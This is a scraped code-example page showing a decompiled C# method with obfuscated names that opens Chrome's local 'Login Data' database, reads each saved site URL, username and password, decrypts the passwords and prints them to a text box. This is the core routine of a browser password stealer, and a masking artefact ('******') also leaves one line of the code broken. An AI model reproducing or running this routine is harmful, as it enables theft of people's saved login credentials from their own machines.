method_9() public method

public method_9 ( int int_4, string string_7 ) : string
int_4 int
string_7 string
return string
Ejemplo n.º 1
0
    // Token: 0x06000075 RID: 117 RVA: 0x00004F08 File Offset: 0x00003108
    public void method_6()
    {
        TextBox textBox = this.TextBox1;

        textBox.Text = textBox.Text + ">>>>>>>>>>Chrome<<<<<<<<<<" + Environment.NewLine;
        string text = Environment.GetFolderPath(Environment.SpecialFolder.LocalApplicationData) + "\\Google\\Chrome\\User Data\\Default\\Login Data";

        checked
        {
            try
            {
                GClass0 gclass = new GClass0(text);
                gclass.method_6("logins");
                if (File.Exists(text))
                {
                    int num  = 0;
                    int num2 = gclass.method_7() - 1;
                    for (int i = num; i <= num2; i++)
                    {
                        string text2 = gclass.method_9(i, "origin_url");
                        string text3 = gclass.method_9(i, "username_value");
                        string text4 = Class3.smethod_0(Encoding.Default.GetBytes(gclass.method_9(i, "password_value")));
                        if (Operators.CompareString(text3, "", false) != 0 & Operators.CompareString(text4, "", false) != 0)
                        {
                            this.TextBox1.AppendText(string.Concat(new string[]
                            {
                                "Host: ",
                                text2,
                                Environment.NewLine,
                                "UserName: "******"Password: ",
                                text4,
                                Environment.NewLine
                            }));
                        }
                    }
                }
            }
            catch (Exception ex)
            {
            }
        }
    }